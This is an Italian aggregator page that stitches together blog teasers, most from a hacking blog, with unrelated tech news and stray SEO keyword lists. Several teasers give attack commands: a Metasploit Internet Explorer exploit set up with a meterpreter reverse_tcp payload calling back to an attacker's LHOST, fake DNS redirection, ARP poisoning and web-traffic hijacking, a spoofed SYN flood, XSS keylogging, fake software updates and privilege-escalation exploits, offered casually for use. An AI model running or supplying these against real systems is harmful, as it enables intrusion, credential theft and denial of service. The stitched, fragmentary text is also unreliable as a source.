Webso – webcultura 3.0

Prima coa, prepariamo il fakedns server utilizziamo metasploit per eseguire un exploit e uno script in python per redirezionare la vittima su un falso web server: http://www.clshack.it/pythonfake-dns-server Ora attiviamo un exploit da metasploit es: windows/browser/ms11_003_ie_css_import use windows/browser/ms11_003_ie_css_import set URIPATH / set SRVPORT 80 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST MY_IP Output: msf exploit(ms11_003_ie_css_import) > exploit [*] Exploit running as background job.

Il seguito di questo articolo:
Arp Poisoning && dns cache poisoning with Scapy on Backbox

Parole chiave per questo articolo:

• scapy dns poisoning

Nel kernel 2.6.38 sono state introdotte numerose novità. La prima novità è che le prestazioni rispetto al kernel 2.6.37 sono notevolmente migliorate. Un’altra importante novità definita da RedHat magica è supporto per Transparent HugePages

Articolo completo fonte:
[Ubuntu] Install Kernel 2.6.38

Ho molto parlato di attacchi di tipo arp poisoning che tramite richieste ARP spoofate consente di effettuare un attacco man in the middle . Evilsocket afferma giustamente che le applicazioni possibili sfruttando il protocollo arp sono molteplici e non necessariamente incentrate sull’hacking della rete o cose simili. Per questo Evilsocket ha sviluppato un piccolo applicativo che, sfruttando tale protocollo,è in grado di rilevare con estrema velocità quali sono i pc attivi sulla rete, quale è il loro indirizzo ip e il loro mac address.

Per approfondire consulta articolo originale:
Who’s Alive: Map your local network whit ARP Request

SqlNinja è un software (scritto da Alberto Revelli ) usato per cercare e sopratutto sfruttare “sql injection” su sistemi che si appoggiano a db Microsoft SQL Server. SqlNinja è scritto in Perl e non ha molte dipendenze SqlNinja permette di ottenere una shell sul database attaccato. SqlNinja è in grado si di effettuare una fingerprint del server SQL, un attacco forza bruta della password dell’amministratore di sistema, un port scanning per individuare porte aperte, tunnel tramite la porta DNS oppure ICMP, quando tutte le porte TCP/UDP sono chiuse ma il server risolve i nomi host esterni oppure pinga La sua potenza aumenta ancora di più se usato con metasploit Un semplice video tutorial per utilizzare SqlNinja è disponibile sul sito ufficiale: http://sqlninja.sourceforge.net/sqlninjademo.html Oltre alla dettagliata documentazione: http://sqlninja.sourceforge.net/sqlninja-howto.html Ecco installare SqlNinja su Ubuntu e Backbox I requisiti sono: NetPacket Net-Pcap Net-DNS Net-RawIP IO-Socket-SSL Digitare: sudo apt-get install libnet-dns-perl libnet-pcap-perl libio-socket-ssl-perl libnet-rawip-perl libnetpacket-perl perl -MCPAN -e “install NetPacket” svn co https://sqlninja.svn.sourceforge.net/svnroot/sqlninja cd sqlninja geany sqlninja.conf ./sqlninja Un esempio: clshack-desktop sqlninja # ./sqlninja -m test Sqlninja rel.

Link fonte:
[How-To] SqlNinja Exploiting Mircrosoft SQL Server

Parole chiave per questo articolo:

• sqlninja guida
• sqlninja tutorial ita
• sqlninja guide
• sqlninja la guida
• sqlninja tutorial

Copio l’articolo da evilsocket : A meno di una settimana dall’evento, il team di BackBox Linux scende in campo a sostegno di quello che molti definiscono uno degli eventi più interessanti nel panorama hacker italiano. Come molti di voi sapranno il CAT (cracca al tesoro) è una iniziativa giunta alla sua quarta edizione, quest’anno si svolgerà a Milano e vedrà la partecipazione di tanti appassionati di sicurezza giunti da tutta Italia

Vai a vedere articolo:
Backbox && CAT2011

Parole chiave per questo articolo:

• NOVI CIOCCOLATO 90% FONDENTE

Ormai per metasploit ci sono sempre più moduli che facilitano la vita ad un attaccante. Ad esempio dopo esserci aperti una sessione con metasploit, ad esempio sfruttando qualche vulnerabilità oppure mandando un file infetto: http://www.clshack.it/metasploit-multi-handler-exploit con i POST modules potremo ricavare informazioni importanti salvate sul pc vittima.

Prosegue Articolo Originale:
[How to] Metasploit POST Modules

Parole chiave per questo articolo:

• metasploit versus w3af

Tweet Python permette di facilitare molte operazioni in poche righe di codice. Ecco una lista di tools scritti in python per velocizzare la ricerca di vulnerabilità

Guarda Articolo Originale:
Python for penetration testers

Tweet Esistono molti fuzzer ftp nessuno dei quali però mi sembrava funzionare bene o.O perciò ne ho scritto uno anche io Ho usato python e le sue ftplib per velocizzarmi le cose inoltre ho utilizzato anche le API di shodan per la ricerca di exploit già presenti sul web su siti come exploit-db . Con questo fuzzer potrete cercare overflow e directory trasversal Le sue opzioni sono molto semplici: -h, –help show this help message and exit –host=HOST Ftp server –port=PORT Ftp server port [default: 21] -u USER, –user=USER Ftp User [default: anonymous] -p PASSWORD, –password=PASSWORD Ftp Password [default: anonymous] -O, –overflowC Check Buffer Overflow in command[default: False] –stringFuzz=STRINGFUZZ Fuzzer string.[default: RANDOM] –overflowU Check Buffer Overflow in login[default: True] –size=SIZE Only fuzz with cyclic pattern.[default: 100] –endSize=ENDSIZE Fuzzing string endsize.[default: 5000] –sleep=SLEEPN Sleep random[0,2]+N[default N: 0] -D FILE, –directoryTraversal=FILE Check Directory Traversal [default: boot.ini] -E API, –exploit=API Check existence exploit [default: False] -v, –verbose Verbose mode[default: False] Ad esempio per cercare overflow e Directory Traversal : python ftp.py –host 192.168.1.154 –sleep 0 -O -u admin -p admin -v -E 7UisGYBcbAURNcxwbbTD*** -D boot.ini Oppure per cercare overflow solo nei comandi: python ftp.py –host 192.168.1.154 –sleep 0 -O –overflowU -u admin -p admin Download: wget http://www.clshack.it/nopaste/ftp.py wget http://www.clshack.it/nopaste/ftpFuzzCore.py

Guarda Articolo Originale:
FtpFuzzer

Parole chiave per questo articolo:

• allintext:ftpfuzzer list

Tweet Scusate se scrivo poco ma sono abbastanza impegnato o.o fra un po’ inizio un corso IBM System I , un corso confindustria .. calcio .

Il seguito di questo articolo:
CVE-2010-3765: Mozilla Firefox remote code Excution module for metasploit

Tweet La versione richiesta di metasploit deve essere > = 3.5.2 Innanzi tutto installiamo come db: postgresql , supportato molto bene da metasploit sudo apt-get install postgresql ruby-dev libpq-dev sudo gem install postgres Creiamo l’utente sudo su postgres createuser backbox -P createdb –owner=backbox metasploit3 exit Installiamo anche questi pacchetti: sudo apt-get install libxml-ruby libxml2-dev sudo apt-get install libxslt-ruby libxslt-dev sudo apt-get install libnokogiri-ruby oppure gem install nokogiri sudo gem install anemone Per evitare questo errore: msf auxiliary(crawler) > run [-] Auxiliary failed: RuntimeError Could not load Anemone/Nokogiri: no such file to load — robots [-] Call stack: [-] /opt/metasploit3/msf3/lib/msf/core/auxiliary/crawler.rb:55:in `setup’ [*] Auxiliary module execution completed Ora avviamo metatasploit console e digitiamo: db_driver postgresql db_connect backbox: password @127.0.0.1:5432/metasploit3 db_workspace -a WMAP_TEST Ora, carichiamo il plugin wmap: load wmap Esempio di output: msf > load wmap [*] [WMAP 1.0] === et [ ] metasploit.com 2011 [*] Successfully loaded plugin: wmap msf > Digitiamo help per avere una lista dei comandi disponibili esempio: msf > help Wmap Commands ============= Command Description ——- ———– wmap_run Test targets wmap_sites Manage sites wmap_targets Manage targets wmap_run :[run module] wmap_sites :[add site's] wmap_targets :[Define target sites] Vediamo ora come iniziare La prima cosa da fare è utilizzare lo scanner : scanner/http/crawler Perciò: msf> use scanner/http/crawler Per vedere le opzioni: show options Per fare qualche prova : set RHOST www.google.com run Ora potremo osservare in wmap_sites che è stato aggiunto un sito Ad esempio: wmap_sites -l Per avere un help: wmap_sites -h Ora possiamo aggiungere il sito appena scansionato a wmap_taget . Quindi: wmap_targets -t www.website.it,IP Per visualizzare i target: wmap_targets -l Per un help: wmap_targets -h Ora che abbiamo il target, possiamo far partire le scansioni con wmap_run . Per vedere i moduli che verranno lanciati da wmap_run, digitare: wmap_run -t Per un help: wmap_run -h Per far partire una scansione: wmap_run -e In data/wmap/ si possono trovare vari file di configurazione come un esempio del profilo, attivabile con wmap_run -e path/profile Per visualizzare alcune vulnerabilità alla fine della scansione: db_vulns Oppure per altre informazioni utili come errori: db_notes Per modificare le impostazioni avanzate, basta digitare: setg TAB

Articolo completo fonte:
Tutorial Metasploit WMAP 1.0

Parole chiave per questo articolo:

• RuntimeError Could not load Anemone/Nokogiri: no such file to load -- robots
• Auxiliary failed: RuntimeError Could not load Anemone/Nokogiri: no such file to load
• could not load anemone/nokogiri metasploit windows
• wmap tutoria

Tweet L’articolo in riferimento a questo video lo potete trovare qui: Attack with XSS [keylogger,form-autocomplete grabber] POST/GET Mai sottovalutare un XSS Video: http://www.youtube.com/watch?v=tl4VXcrEi6Q

Guarda Articolo Originale:
[VIDEO]XSS POST ATTACK [auto form grabber] on BackBox

Tweet Gli xss vengono sottovalutati da administrator idioti. Da wikipedia: Cross-site scripting holes are web-application vulnerabilities which allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers

Articolo completo fonte:
Attack with XSS [keylogger,form-autocomplete grabber] POST/GET

Tweet w3af è eseguibile sia in GUI che in modalità console (stile metasploit.. ) La modalità GUI, è una merda… si incricca spesso risponde dopo anni v.v e non mi piace o.o Perciò vediamo come utilizzare w3af per eseguire test di sicurezza su siti web dalla console Per prima cosa avviamo w3af : sudo w3af_console Una volta avviato, digitiamo hrlp per avere un po’ di informazioni utili: w3af> > > help |——————————————————————————————————————————————————————————| | start | Start the scan.

Continua la lettura con la fonte di questo articolo:
Tutorial w3af CONSOLE

Parole chiave per questo articolo:

• programmi come w3af

Con Winmate possiamo ottimizzare il nostro OS Windows Tra le tantissime applicazioni che consentono di ottimizzare il PC troviamo anche l’utilissima Winmate che in modo semplice e veloce permette di migliorare notevolmente la velocità del computer, eseguire il backup dei file di sistema, mantenere il PC pulito, ottimizzato e quindi più sicuro e, garantire un buon livello di sicurezza online. Un prodotto All in One e soprattutto completamente gratuito. Possiamo scaricarlo dal sito ufficiale

Per approfondire consulta articolo originale:
Ottimizzare il PC con WinMate

Visualizza gli aggiornamenti di Facebook direttamente dal desktop Chi usa Facebook sa che in alcuni orari, soprattutto quando ci sono tanti amici connessi, è un continuo avviso di notifiche di aggiornamento di stato, avvisi di chat, tag e “mi piace” Per tenere sotto controllo tutto questo senza dover accedere ogni volta a Facebook , possiamo utilizzare Facebook Desktop che ci permetterà di avere tutti gli aggiornamenti tramite un’ icona presente nella barra delle applicazioni.

Link articolo originale:
Facebook Desktop

Parole chiave per questo articolo:

• deejay png

Tweet In questo semplice video mostro come è possibile BLOCCARE la connessione ad un pc re direzionando il suo traffico verso un HOST INESISTENTE , oppure bloccare la connessione ad un singolo sito web con tcpkill durante un arp poisoning. Ho sfruttato scapy e tcpkill , entrambi disponibili in BackBox . Url video: http://www.youtube.com/watch?v=lSl6u7kwe8c Il file per la falsificazione del mac è scaricabile da questo url: http://www.clshack.it/nopaste/mitm.py (aggiungere: packet.hwsrc=”MAC” ) Come si vede da scapy in console: > > > ls(packet) hwtype : XShortField = 1 (1) ptype : XShortEnumField = 2048 (2048) hwlen : ByteField = 6 (6) plen : ByteField = 4 (4) op : ShortEnumField = 1 (1) hwsrc : ARPSourceMACField = ’00:40:f4:b0:5e:81′ (None) psrc : SourceIPField = ’192.168.1.1′ (None) hwdst : MACField = ’00:00:00:00:00:00′ (’00:00:00:00:00:00′) pdst : IPField = ’192.168.1.153′ (’0.0.0.0′) Buon divertimento

Link fonte:
Arp DOS with Scapy and TcpKill on BackBox

Parole chiave per questo articolo:

• hijacking http backbox

Tweet Semplice video che mostra come modificare le richieste ad una pagina web e le risposte di una pagina web dal server tramite un attacco molto conosciuto MITM , senza l’utilizzo di ettercap e i suoi filtri. Per capire meglio il funzionamento dell’attacco vi rimando a questo articolo: Scapy: Arp Poisoning and WEB TRAFFIC HIJACKING I tools da me utilizzati sono tutti presenti in backbox linux .

Per approfondire consulta articolo originale:
Arp poisoning with scapy and web request spoofed with paros proxy on Backbox

Apple ha aperto il suo nuovo Mac App Store il 6 gennaio 2010. Nel momento in cui ha aperto il nuovo Apple Store si sono subito trovati più di 1000 applicazioni

Link articolo originale:
Apple chiude la pagina dedicata ai giochi

Quanto ci piacerebbe poter giocare ai nostri cari vecchi giochi da console anni 80-90 ? Quanti ricordi affiorano alla nostra mente! Oggi possiamo farlo grazie a particolari programmi capaci di emulare tali applicazioni, anche sul nostro PC super hi-tech! Parlo, naturalmente, dei famosi emulatori! Uno dei migliori in circolazione è, sicuramente, Sixtyforce : programma abbastanza datato, ma che è sempre stato oggetto di continui aggiornamenti. Oltre all’applicativo, ci occorreranno anche le cosiddette ROMS, ovvero le classiche “cartucce da gioco” (possiamo trovarle su romulation.net) Al momento solo per MAC!

Il seguito di questo articolo:
Sixtyforce – Emulare i vecchi giochi da console!

The BackBox team is proud to announce the final release of BackBox Linux 1. BackBox Linux 1 features the following upstream components: Ubuntu 10.04, Linux 2.6.32 and Xfce 4.6.1 What’s new * New ISO image (32bit & 64bit) * System upgrade * Performance boost (using cgroup, the notorious “4 lines of code better than 200″ in user-space) * New look and feel * Improved start menu * Hacking tools new or updated: Aircrack-ng 1.1, Metasploit Framework 3.5.1, OpenVAS 3, SET 1.1, SkipFish 1.84b, SqlMap 0.9, w3af 1.0-rc4, etc

Continua la lettura con la fonte di questo articolo:
[DOWNLOAD]BackBox 1 is Out

Sono in trasferimento quindi attendete che si propaghino i nuovi dns Questioni di pochi giorni !

Fonte:
In trasferimento

ClsHack augura a tutti un Buon Natale e un Felice anno Nuovo. Colgo l’occasione per ringraziare tutti i miei lettori, oltre 35 mila al mese v.v e poi le persone che mi hanno aiutato come evilsocket (a cui ho veramente rotto le balle via email o.o), s3rg3770,community di backbox e a tutti gli altri Altri: Auguri ClsHack (:

Per approfondire consulta articolo originale:
Happy Christmas and Happy new year

Sfruttando la potenza di scapy in 5 righe di codice potremo effettuare un attacco di tipo arp poisoning NON completo (ettercap lo fa completo…) nel senso che non dirigeremo il traffico che riceveremo verso il router ma lo dirotteremo verso una pagina web di prova… Quindi avremo bisogno di: -Linux( meglio backbox poichè ha

Vai a vedere articolo:
Scapy: Arp Poisoning and WEB TRAFFIC HIJACKING

Digitale terrestre: la guerra della Tv Locali contro il governo (22/12/2010) Le tv locali hanno dichiarato guerra al governo. Ma la guerra deve ancora cominciare. A pochi giorni dal termine dei lavori dello switch-off del digitale terrestre nel nord Italia, dopo mesi di proteste e minacce di ricorsi al Tar del Lazio ,  è avvenuta l’inevitabile rottura tra le emittenti locali e i consorzi dei grandi network nazionali , con la sortita improvvisa di FRT e Aeranti-Corallo dal cda di DGTVi .

Guarda Articolo Originale:
Cubovision, Wi-fi libero, la guerra delle Tv Locali, Internet Tv: i nuovi articoli da tvdigitaldivide.it

Avevo già parlato degli attacchi dos/ddos con tool come pyloris Vediamo come eseguire un syn flood con scapy… prima però: Da Wikipedia, l’enciclopedia libera. Un attacco viene compiuto da un utente malevolo che invia diversi pacchetti ma non ritorna il segnale “ACK” al server

Per approfondire consulta la fonte:
[PYTHON SCAPY] DOS:SYN FLOOD WITH IP SPOOFING

Parole chiave per questo articolo:

• pyloris ddos

Italia leader nella diffusione di smartphone, ultimo per la Banda Larga Dal comunicato del 06/12/2010 dell’Autorità Garante per le comunicazioni: Primo Paese per l’utilizzo dei social network . Leader mondiale per la diffusione degli smartphone e per l’utilizzo di mp3 e iPod . Maglia rosa per i prezzi della telefonia mobile.

Per approfondire consulta articolo originale:
Articoli dal nuovo sito di Tv Digital Divide

Vediamo con scapy come è facile attuare diverse tipologie di scansioni ‘per verificare se una porta è attiva o meno Da wikipedia leggiamo: Il SYN Scan è un tipo di scansione in cui l’handshake non viene completato. L’attaccante invia, un pacchetto TCP con flag SYN attivo e se la porta da controllare è aperta Altri: [example] IP SPOOFING with scapy [guida]Testare la sicurezza di rete con nmap Grendel-Scan:web application security testing tool

Link articolo originale:
[PYTHON SCAPY] SYN SCAN, ACK SCAN , NULL SCAN

Parole chiave per questo articolo:

• scapy guida
• guida scapy

In questi giorni non sono stato molto attivo perchè avevo molto da studiare Comunque ho avuto lo stesso il tempo di giocherellare o.O con scapy e i miei esperimenti Su internet ho trovato praticamente niente riguardo all’ IP SPOOFING in merito ad esempi concreti si trova invece abbastanza … teoria su teoria …

Fonte Articolo:
[example] IP SPOOFING with scapy

Parole chiave per questo articolo:

• scapy
• ipspoofing scapy
• spoofing ip scapy

Changelog: Kernel 2.6.35.8 – *Much* improved mac80211 stack. USB 3.0 support.

Guarda Articolo Originale:
[DOWNLOAD] BackTrack r2

Da un articolo di Andrea Lawendel del 22/11/2010 sul Corriere Economia: Tra il graduale spegnimento degli impianti analogici e la crescita generale della comunicazione video-digitale, il mondo della televisione si sta trasformando . Offre nuove opportunità di sviluppo economico e sociale, ma porta anche parecchie incertezze.

Fonte Articolo:
La convergenza digitale tra Internet e Tv alla prova divano

Con questo exploit, testato da me su windows 7 potrete eseguire comandi con privilegi SYSTEM . Come con KiTrap0D , oppure ad esempio tramite l’exploiting della MS-061 potremo eseguire comandi con privilegi elevati senza restrizioni e senza la necessità di conoscere la password. Da metasploit si legge: # This script exploits the Task Scheduler 2.0 Altri: [Virtual DOS]Exploit privilege escalation windows 2000/XP/VISTA/7/SERVER [tutorial]Tool for Privilege Escalation [CVE 2010-3856]GNU C library,Linux Kernel Privilege Escalation Vulnerability Process Hacker: Task Manager DEFINITIVO [Exploit]Privilege Escalation Kernel

Link fonte:
[Windows 7/2008 x86/x64 ] Windows Task Scheduler Privilege Escalation

Metasploit , ci consegna una serie di scanner per cercare di entrare in un sistema, sfruttando attacchi dizionario, con password/login di default oppure con nostri dizionari.. Oppure questi auxiliary potremo usarli dopo un attacco arp poisoning in modo da ridirezionare la vittima verso il nostro fake server e così vedremo le password che immetterà. Anche Altri: Metasploit 3.4 and Metasploitable

Prosegue Articolo Originale:
[Metasploit]How-To Auxiliary Scanner

Dopo adobe,firefox anche ie cade, ri-cade in questi oday ,sfruttati per diffondere malware/virus in giro Gli exploit sono pubblici e utilizzabili anche con metasploit .

Il seguito di questo articolo:
[cve-2010-3962]Internet Explorer 6, 7, 8 Remote Code Execution

Evilgrade è un semplice tool scritto in perl che sfrutta un eventuale attacco per re direzionare il traffico, (es: arp poisoning o.o) per fornire ad una eventuale richiesta di update da parte di un software, un pacchetto contraffatto o.o Vediamo come installarlo su archLinux ‘www.amsn-project.net’ Allora voi dovrete fare un dns spoof e rendirizzare: www.amsn-project.net

Fonte Articolo:
ISR-Evilgrade ToolKit ._. [fake update]

Ragazzi se aggiorno il firmware tramite KIES perdo tutti i dati?

Per approfondire consulta la fonte:
Aggiornamento firmware – Samsung Galaxy S II / 2 (i9100) – Forum …

Nokia E5 firmware aggiornato alla V42.010 (RM -632).

Guarda Articolo Originale:
Nokia E5 aggiornamento Firmware V. 42.010 – Changelog | Notizie …

Vi riporto una guida trovato su exploit-db che mostra, come sfruttando un semplice bug su sistemi linux NON aggiornati, si possa aprirsi una shell con privilegi root in un server hosting sfruttando anche php http://www.clshack.it/index.php?s=+Privilege+Escalation Nella realtà non è così semplice come mostrato nella guida … Sfido chiunque a riuscire ad aprire una shell Altri: [METASPLOIT]Attack Linux and open remote Shell [CVE 2010-3856]GNU C library,Linux Kernel Privilege Escalation Vulnerability

Guarda Articolo Originale:
Attack web server o.o [get root ._. shell ]

Penso che non ci sia un gran che da spiegare. Exploit provato e funzionante da me su ubuntu 10.04.

Fonte:
[CVE 2010-3856]GNU C library,Linux Kernel Privilege Escalation Vulnerability

Molte persone prima di aggiornare il loro iPhone preferiscono aspettare alcune settimane, però alcune applicazioni disponibili in AppStore richiedono una versione del firmware successiva a quella installata sul nostro device, …

Prosegue Articolo Originale:
Firmware Changer 4.0: fai credere al sistema di avere un altro …

La gente parla tanto… Linux sicuro… niente virus… ma non è così. Di virus per Linux ne esistono… solo che non se ne parla, ma presto cominceranno a girare ovunque… Perchè ? Perchè sempre più gente utilizza sistemi come operativi come Linux Ubuntu sempre più semplici da usare, dove l’utente si fida come avviene in Altri: [Exploit]Privilege Escalation Kernel [tutorial]Tool for Privilege Escalation [Virtual DOS]Exploit privilege escalation windows 2000/XP/VISTA/7/SERVER [guida]Installare Kernel 2.6.33 su UBUNTU UBUNTU(e derivati):Rimuovere tutti i kernel inutilizzati

Continua la lettura con la fonte di questo articolo:
[CVE-2010-3904]Linux Kernel Privilege Escalation Vulnerability

Parole chiave per questo articolo:

• scala 40 su ubuntu